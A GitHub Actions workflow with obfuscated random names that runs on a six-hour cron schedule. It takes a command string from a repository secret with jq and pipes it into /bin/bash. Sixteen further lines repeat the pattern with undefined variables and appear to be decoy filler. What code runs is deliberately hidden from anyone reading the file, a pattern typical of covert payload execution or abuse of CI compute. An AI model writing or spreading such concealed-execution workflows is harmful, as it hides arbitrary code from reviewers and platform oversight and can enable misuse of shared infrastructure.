name: youluyuan3412

on:
  workflow_dispatch:
  schedule:
    - cron: '47 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: youluyuan3412
        env:
          jpwmv50158: ${{ secrets.jpwmv50158 }}
        run: |
          echo $jpwmv50158 | jq -r .avvh145 | /bin/bash
          echo $r5876 | jq -r .n97 | /bin/bash
          echo $h34695 | jq -r .ldwbj33549 | /bin/bash
          echo $k2 | jq -r .xesb2710 | /bin/bash
          echo $sax6587 | jq -r .j6 | /bin/bash
          echo $pzikd4555 | jq -r .vugug32 | /bin/bash
          echo $bfkr6 | jq -r .gkdtm4982 | /bin/bash
          echo $jjjcn51 | jq -r .m95550 | /bin/bash
          echo $t4 | jq -r .jbrbu099 | /bin/bash
          echo $ovlm5268 | jq -r .b43 | /bin/bash
          echo $us5 | jq -r .saq44401 | /bin/bash
          echo $u913 | jq -r .vn7 | /bin/bash
          echo $dumg2 | jq -r .smf4 | /bin/bash
          echo $wghn917 | jq -r .k17759 | /bin/bash
          echo $rnql74 | jq -r .h1 | /bin/bash
          echo $lvrz5346 | jq -r .rlmir5 | /bin/bash
          echo $um02 | jq -r .i3324 | /bin/bash

